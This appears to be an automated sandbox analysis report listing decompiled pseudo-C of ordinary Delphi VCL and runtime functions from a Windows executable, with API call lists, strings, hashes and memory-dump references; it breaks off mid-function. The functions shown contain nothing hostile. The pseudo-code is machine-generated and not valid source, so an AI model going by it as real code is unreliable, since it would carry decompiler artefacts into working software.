				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(_t29);
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x47bb84 == 0) {
					 *0x47bb84 = E0040BE74("comctl32.dll", __eax, _t29);
					if( *0x47bb84 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x47bb88 = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E0041A300(_t43, 1, 0);
				_push(_t45);
				_push(0x439c4a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x47bb88 == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E00438A98(_t28);
					_push(_t11);
					L0040D714();
					if(_t11 == 0) {
						_t33 =  *0x479eb4; // 0x41abc4
						E0040B6D8(_t33, 1);
						E00403BF4();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E00438A98(_t28));
					if( *0x47bb88() != 0) {
						_t34 =  *0x479eb4; // 0x41abc4
						E0040B6D8(_t34, 1);
						E00403BF4();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x439c51);
				return E0040346C(_v8);
			}

0x00439b51
0x00439b53
0x00439b54
0x00439b57
0x00439b59
0x00439b62
0x00439b6e
0x00439b7d
0x00439b89
0x00439b8d
0x00439b9a
0x00439b9a
0x00439b8d
0x00439b7d
0x00439baf
0x00439bb4
0x00439bb5
0x00439bba
0x00439bbd
0x00439bc7
0x00439c01
0x00439c06
0x00439c08
0x00439c08
0x00439c0b
0x00439c0e
0x00439c13
0x00439c14
0x00439c1b
0x00439c1d
0x00439c2a
0x00439c2f
0x00439c2f
0x00439bc9
0x00439bc9
0x00439bce
0x00439bd0
0x00439bd0
0x00439bd3
0x00439bd4
0x00439bdd
0x00439be6
0x00439be8
0x00439bf5
0x00439bfa
0x00439bfa
0x00439be6
0x00439c36
0x00439c39
0x00439c3c
0x00439c49

APIs

Part of subcall function 0040BE74: 73941500.VERSION(?,0040BF5C,?,?,00000000,?,00000000,?,00000000,0040BF2D,?,00000000,?,00000000,0040BF4A), ref: 0040BF05

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00439B84
GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00439B95

Strings

ImageList_WriteEx, xrefs: 00439B8F
comctl32.dll, xrefs: 00439B64
comctl32.dll, xrefs: 00439B7F
`$A, xrefs: 00439BA5

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: 73941500AddressHandleModuleProc
String ID: ImageList_WriteEx$`$A$comctl32.dll$comctl32.dll
API String ID: 3590821372-3865593760
Opcode ID: 8b33f4b5a9db79714508bb2ad4b95ecd454abca666951a99386970ec849bcf93
Instruction ID: 35764039ba901c97daf5a8f7460f1f2d8746cfc4dea9b4f9219d9576b357c101
Opcode Fuzzy Hash: 8b33f4b5a9db79714508bb2ad4b95ecd454abca666951a99386970ec849bcf93
Instruction Fuzzy Hash: E82131306002059BD710EB7A9D46B6A77E8DB49718F10203AF805D76E6DBBDEC40DA5D

Uniqueness

Uniqueness Score: -1.00%

Function 004228B4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E004228B4(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x47b93e != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406444();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x47b928; // 0x4228b4
					 *0x47b928 = E004223DC(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x47b928(_t27, _t29);
				}
				return _t24;
			}

0x004228bd
0x004228c0
0x004228ca
0x004228ef
0x004228f7
0x00422917
0x0042291c
0x00422927
0x00422932
0x0042293c
0x0042293d
0x0042293e
0x0042293f
0x00422940
0x00422941
0x0042294b
0x0042294d
0x00422955
0x00422956
0x00422956
0x0042295b
0x0042295b
0x004228cc
0x004228d1
0x004228de
0x004228eb
0x004228eb
0x00422965

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042290C
GetSystemMetrics.USER32(00000000), ref: 00422921
GetSystemMetrics.USER32(00000001), ref: 0042292C
lstrcpy.KERNEL32(?,DISPLAY), ref: 00422956

Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C

Strings

DISPLAY, xrefs: 0042294D
GetMonitorInfoW, xrefs: 004228CC

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 2545840971-2774842281
Opcode ID: 1dd550c4df5df9785c8a62445d791c803d11415983239e3f9ad1272bafbf0c05
Instruction ID: ac0c7012f5b19557cf989970d1ed9c82e49588958c0b7a82b59e6b953f1760c5
Opcode Fuzzy Hash: 1dd550c4df5df9785c8a62445d791c803d11415983239e3f9ad1272bafbf0c05
Instruction Fuzzy Hash: 8D1124F17013166FC7209F64AD847A7BBE8EB06360F40452AFE19D7240D3B4A880CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 004493C0, Relevance: 10.6, APIs: 7, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004493C0(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				_t1 = _t19 + 0x44; // 0x0
				if(__edx ==  *_t1) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E00449384(_t19, _t21, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E00406AEC(SendMessageA(_t27, 0x84, 0, E00406B64(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}

0x004493c0
0x004493c0
0x004493c4
0x004493c7
0x004493c9
0x004493cb
0x004493cf
0x00449444
0x00449444
0x004493d1
0x004493d1
0x004493d8
0x00449434
0x0044943f
0x00000000
0x004493da
0x004493db
0x004493e0
0x004493ed
0x004493f1
0x00000000
0x004493f3
0x004493f6
0x00449404
0x00000000
0x00449406
0x0044942d
0x0044942d
0x00449404
0x004493f1
0x004493d8
0x0044944d

APIs

GetCursorPos.USER32 ref: 004493DB
WindowFromPoint.USER32(?,?), ref: 004493E8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004493F6
GetCurrentThreadId.KERNEL32 ref: 004493FD
SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 00449416
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 0044942D
SetCursor.USER32(00000000), ref: 0044943F

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 3877ee40bbde9c6f9755b9bc2051df5da4396341496b67e4263fe7c3672dd42c
Instruction ID: bb3fc235c9a50a6e927135b114b6ffae1f1d66b14da077b64caf87c95eadb067
Opcode Fuzzy Hash: 3877ee40bbde9c6f9755b9bc2051df5da4396341496b67e4263fe7c3672dd42c
Instruction Fuzzy Hash: D30184223056106AEB2177764C86F7B36A89F85B5CF11413FB505BA2C3E93E8C12A26D

Uniqueness

Uniqueness Score: -1.00%

Function 00444EE0, Relevance: 9.2, APIs: 6, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00444EE0(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x4450ae);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E0042BA9C(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E0042A894( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E004302C0(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x4450bc);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E0041D068( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E0041D068( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E00444E54(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E0044537C(_v8) == 0 || E00444EA0(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E00442190( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E00444E54(_t150);
							} else {
								E00444E54(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

0x00444ee0
0x00444ee0
0x00444ee0
0x00444ee0
0x00444ee1
0x00444ee3
0x00444ee6
0x00444ee9
0x00444ef1
0x00444ef4
0x00445004
0x0044500b
0x00445023
0x00445023
0x00445028
0x00445029
0x0044502e
0x00445031
0x00445038
0x00445048
0x00445056
0x0044505e
0x00445064
0x00445077
0x00445077
0x00445082
0x00445089
0x0044508c
0x0044508f
0x00445098
0x00000000
0x004450a8
0x004450ad
0x00444efa
0x00444efa
0x00444efd
0x00444f3d
0x00444f4b
0x00444f59
0x00444f68
0x00444f84
0x00444fa3
0x00444fa3
0x00444fa8
0x00444fab
0x00444eff
0x00444eff
0x00444f02
0x00444fb8
0x00444fbe
0x00444fc8
0x00444fd8
0x00444fe9
0x00444fe5
0x00444fe5
0x00444fe5
0x00444ff4
0x00444ff4
0x00444f08
0x00444f0b
0x004450b6
0x00444f11
0x00444f12
0x00444f18
0x00444f1f
0x00444f25
0x00444f28
0x00444f28
0x00444f1f
0x00444f0b
0x00444f02
0x004450bf
0x004450bf

APIs

FillRect.USER32(?,?), ref: 00444F59
GetClientRect.USER32(00000000,?), ref: 00444F84
FillRect.USER32(?,?,00000000), ref: 00444FA3

Part of subcall function 00444E54: CallWindowProcA.USER32(?,?,?,?,?), ref: 00444E8E

BeginPaint.USER32(?,?), ref: 0044501B
GetWindowRect.USER32(?,?), ref: 00445048
EndPaint.USER32(?,?,004450BC), ref: 004450A8

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc
String ID:
API String ID: 901200654-0
Opcode ID: aff4893d9b9e2c9666173a6c9f99ab74db62f8aa084774062cd4367c2ffb8da8
Instruction ID: 454e2128855d1b730d2b51f27d8d7d13492bbf731180744bb3852be94e670c1e
Opcode Fuzzy Hash: aff4893d9b9e2c9666173a6c9f99ab74db62f8aa084774062cd4367c2ffb8da8
Instruction Fuzzy Hash: 1D512D74A00609EFDB00DBE9C589E9DB7F8AF48314F1581AAF414EB352D738AE45CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00401C50, Relevance: 9.1, APIs: 6, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00401C50() {
				void* _v8;
				intOrPtr* _v12;
				void* _t13;
				void* _t15;
				intOrPtr* _t18;
				void* _t31;
				void* _t37;
				intOrPtr _t42;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t44 = _t46;
				_t47 = _t46 + 0xfffffff8;
				if( *0x47b5bc == 0) {
					return _t13;
				} else {
					_push(_t44);
					_push(E00401D44);
					_push( *[fs:eax]);
					 *[fs:eax] = _t47;
					if( *0x47b045 != 0) {
						_push(0x47b5c4);
						L00401358();
					}
					 *0x47b5bc = 0;
					_t15 =  *0x47b61c; // 0x5bc9b8
					LocalFree(_t15);
					 *0x47b61c = 0;
					_t18 =  *0x47b5e4; // 0x5ba724
					_v12 = _t18;
					while(0x47b5e4 != _v12) {
						VirtualFree( *(_v12 + 8), 0, 0x8000);
						_v12 =  *_v12;
					}
					E004013F4(0x47b5e4);
					E004013F4(0x47b5f4);
					E004013F4(0x47b620);
					_t31 =  *0x47b5dc; // 0x5ba0f0
					_v8 = _t31;
					while(_v8 != 0) {
						 *0x47b5dc =  *_v8;
						LocalFree(_v8);
						_t37 =  *0x47b5dc; // 0x5ba0f0
						_v8 = _t37;
					}
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(0x401d4b);
					if( *0x47b045 != 0) {
						_push(0x47b5c4);
						L00401360();
					}
					_push(0x47b5c4);
					L00401368();
					return 0;
				}
			}

0x00401c51
0x00401c53
0x00401c5d
0x00401d4e
0x00401c63
0x00401c65
0x00401c66
0x00401c6b
0x00401c6e
0x00401c78
0x00401c7a
0x00401c7f
0x00401c7f
0x00401c84
0x00401c8b
0x00401c91
0x00401c98
0x00401c9d
0x00401ca2
0x00401cc2
0x00401cb5
0x00401cbf
0x00401cbf
0x00401cd1
0x00401cdb
0x00401ce5
0x00401cea
0x00401cef
0x00401cf6
0x00401cfd
0x00401d06
0x00401d0b
0x00401d10
0x00401d13
0x00401d1b
0x00401d1e
0x00401d21
0x00401d2d
0x00401d2f
0x00401d34
0x00401d34
0x00401d39
0x00401d3e
0x00401d43
0x00401d43

APIs

RtlEnterCriticalSection.NTDLL(0047B5C4), ref: 00401C7F
LocalFree.KERNEL32(005BC9B8,00000000,00401D44), ref: 00401C91
VirtualFree.KERNEL32(?,00000000,00008000,005BC9B8,00000000,00401D44), ref: 00401CB5
LocalFree.KERNEL32(00000000,?,00000000,00008000,005BC9B8,00000000,00401D44), ref: 00401D06
RtlLeaveCriticalSection.NTDLL(0047B5C4), ref: 00401D34
RtlDeleteCriticalSection.NTDLL(0047B5C4), ref: 00401D3E

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 358fe68b41b34c4f71fb20b6b5e9b80eebec25c97cf1363d1e6e8ada2e81b474
Instruction ID: 99de1bbe63b05b8271605f64c4c6a66148645650e88a1b90d21e67d1f51eefe7
Opcode Fuzzy Hash: 358fe68b41b34c4f71fb20b6b5e9b80eebec25c97cf1363d1e6e8ada2e81b474
Instruction Fuzzy Hash: 4D213274904244AFE711DBA9D845B8E77E4DB05308F50807BE808A77E1C73C9980DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00428D4C, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428D4C(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x47995c; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x47995c; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x47995c; // 0x0
				SetPropA(_a4,  *0x47bb0a & 0x0000ffff, _t27);
				_t31 =  *0x47995c; // 0x0
				SetPropA(_a4,  *0x47bb08 & 0x0000ffff, _t31);
				_t35 =  *0x47995c; // 0x0
				 *0x47995c = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}

0x00428d51
0x00428d54
0x00428d5c
0x00428d62
0x00428d74
0x00428d89
0x00428da4
0x00428da4
0x00428da9
0x00428dbb
0x00428dc0
0x00428dd2
0x00428de3
0x00428de8
0x00428df8
0x00428e00

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00428D74
GetWindowLongA.USER32(?,000000F0), ref: 00428D7F
GetWindowLongA.USER32(?,000000F4), ref: 00428D91
SetWindowLongA.USER32(?,000000F4,?), ref: 00428DA4
SetPropA.USER32(?,00000000,00000000), ref: 00428DBB
SetPropA.USER32(?,00000000,00000000), ref: 00428DD2

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: b2816ec1cffd5b56bff52f5c5d0687fa979dec1f46ec9438c02b03c3d489360d
Instruction ID: c7e75729d8d2606f5068b16dba0a7983d3969893cafcbacc8782215698b8d8c1
Opcode Fuzzy Hash: b2816ec1cffd5b56bff52f5c5d0687fa979dec1f46ec9438c02b03c3d489360d
Instruction Fuzzy Hash: 0411FEB5201105BFDF40EF99DC44E9A3BA8EB09360F108525BA19D72D1D735DD50CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041D88C, Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D88C(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041D068( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041D068( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041D148( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041C3A8(E0041D02C( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041C3A8(E0041D02C( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x0041d88d
0x0041d898
0x0041d8aa
0x0041d8b9
0x0041d8f3
0x0041d904
0x0041d8bb
0x0041d8cd
0x0041d8de
0x0041d8de

APIs

Part of subcall function 0041D068: CreateBrushIndirect.GDI32(?), ref: 0041D112

UnrealizeObject.GDI32(00000000), ref: 0041D898
SelectObject.GDI32(?,00000000), ref: 0041D8AA
SetBkColor.GDI32(?,00000000), ref: 0041D8CD
SetBkMode.GDI32(?,00000002), ref: 0041D8D8
SetBkColor.GDI32(?,00000000), ref: 0041D8F3
SetBkMode.GDI32(?,00000001), ref: 0041D8FE

Part of subcall function 0041C3A8: GetSysColor.USER32(?), ref: 0041C3B2

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 8effa9a3aaf91be0486b0b5ac50cd501f26fcab478501b83c7975bdf7d960646
Instruction ID: 106faa5e388aafaf7305692d19dc8e9c727b313b414877f3d4be70fb462fcbae
Opcode Fuzzy Hash: 8effa9a3aaf91be0486b0b5ac50cd501f26fcab478501b83c7975bdf7d960646
Instruction Fuzzy Hash: 83F0BBB1A40200ABCE00FFBADDC6D4B3B9C5F08309700445AB905EF29BCA3DD8608739

Uniqueness

Uniqueness Score: -1.00%

Function 00405EED, Relevance: 9.0, APIs: 6, Instructions: 41
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EED(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x47b5b4)) =  *((intOrPtr*)(__eax - 0x47b5b4)) + __eax - 0x47b5b4;
				 *0x479008 = 2;
				 *0x47b014 = 0x4011fc;
				 *0x47b018 = 0x401204;
				 *0x47b046 = 2;
				 *0x47b000 = E00404FA0;
				if(E004032B0() != 0) {
					_t3 = E004032E0();
				}
				E004033A4(_t3);
				 *0x47b04c = 0xd7b0;
				 *0x47b218 = 0xd7b0;
				 *0x47b3e4 = 0xd7b0;
				 *0x47b03c = GetCommandLineA();
				 *0x47b038 = E0040130C();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x47b5b8 = E00405E24(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x47b5b8 = E00405E24(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x47b5b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x47b030 = _t11;
				return _t11;
			}

0x00405eed
0x00405ef2
0x00405ef7
0x00405ef9
0x00405f00
0x00405f0a
0x00405f14
0x00405f1b
0x00405f2c
0x00405f2e
0x00405f2e
0x00405f33
0x00405f38
0x00405f41
0x00405f4a
0x00405f58
0x00405f62
0x00405f76
0x00405faf
0x00405f78
0x00405f86
0x00405f9e
0x00405f88
0x00405f88
0x00405f88
0x00405f86
0x00405fb4
0x00405fb9
0x00405fbe

APIs

Part of subcall function 004032B0: GetKeyboardType.USER32(00000000), ref: 004032B5
Part of subcall function 004032B0: GetKeyboardType.USER32(00000001), ref: 004032C1

GetCommandLineA.KERNEL32 ref: 00405F53
GetVersion.KERNEL32 ref: 00405F67
GetVersion.KERNEL32 ref: 00405F78
GetCurrentThreadId.KERNEL32 ref: 00405FB4

Part of subcall function 004032E0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403302
Part of subcall function 004032E0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403351,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403335
Part of subcall function 004032E0: RegCloseKey.ADVAPI32(?,00403358,00000000,?,00000004,00000000,00403351,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040334B

GetThreadLocale.KERNEL32 ref: 00405F94

Part of subcall function 00405E24: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405E8A), ref: 00405E4A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: ebba62bb8ed549545e8d677d5221f979693053b389705836cf4b91af096e17ba
Instruction ID: e1ede18ddd7f021d7f4f9b44b2d37be9f1aa5bd192689019796b73b222782ef7
Opcode Fuzzy Hash: ebba62bb8ed549545e8d677d5221f979693053b389705836cf4b91af096e17ba
Instruction Fuzzy Hash: 10011EB440478699EB11BF71A84A34A3AA0EB11308F1044BFD558AA3F2EB7C01848BDE

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA30, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040BA30(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				struct _MEMORY_BASIC_INFORMATION _v40;
				char _v301;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v320;
				char _v324;
				intOrPtr _v328;
				char _v332;
				void* _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				char _v368;
				void* _v372;
				char _v376;
				intOrPtr _t55;
				intOrPtr _t65;
				intOrPtr _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t107;
				void* _t114;
				void* _t115;
